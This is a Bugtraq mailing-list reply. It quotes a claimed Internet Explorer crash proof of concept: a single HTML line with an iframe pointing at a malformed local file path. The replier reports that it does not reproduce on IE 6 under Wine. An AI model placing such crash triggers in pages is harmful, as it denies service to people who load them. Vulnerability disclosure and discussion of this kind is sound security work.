
Date: Fri, 09 Jun 2006 07:00:25 +0300
From: Andrei Ponomarev <iceman@...meaonline.net>
To: bugtraq@...urityfocus.com
Subject: Re: Internet Explorer vulnerbility


Mr.Niega@...il.com:
> /*
> *
> * Internet Explorer Crash [Proof of concept]
> * Bug discovered by MarjinZ & Mr.Niega
> * http://www.swerat.com/
> * 
> * Affected Software: Internet explorer
> * Severity: Unknown
> * Impact: Crash
> * Solution Status: Unpatched
> *
> * E-Mail: Mr.Niega@...il.com & MarjinZ@...il.com
> * __  __       __  __ 
> *|  \/  | __ _|  \/  |
> *| |\/| |/ _` | |\/| |
> *| |  | | | | | |  | |
> *|_|  |_|_| |_|_|  |_|
> * Credits goes out to GДrBiz a.k.a *Gabriel,Garbiz,Gabbelito,GДrbpiz 
> * K@2@nj@n ╖w─nn╖0n
> *
> */
> <HTLM><BODY><IFRAME src="File://Ч:/"></BODY></HTML>
>
>   
Unreproducible on IE 6.0.2800.1106 started  through wine emulator.


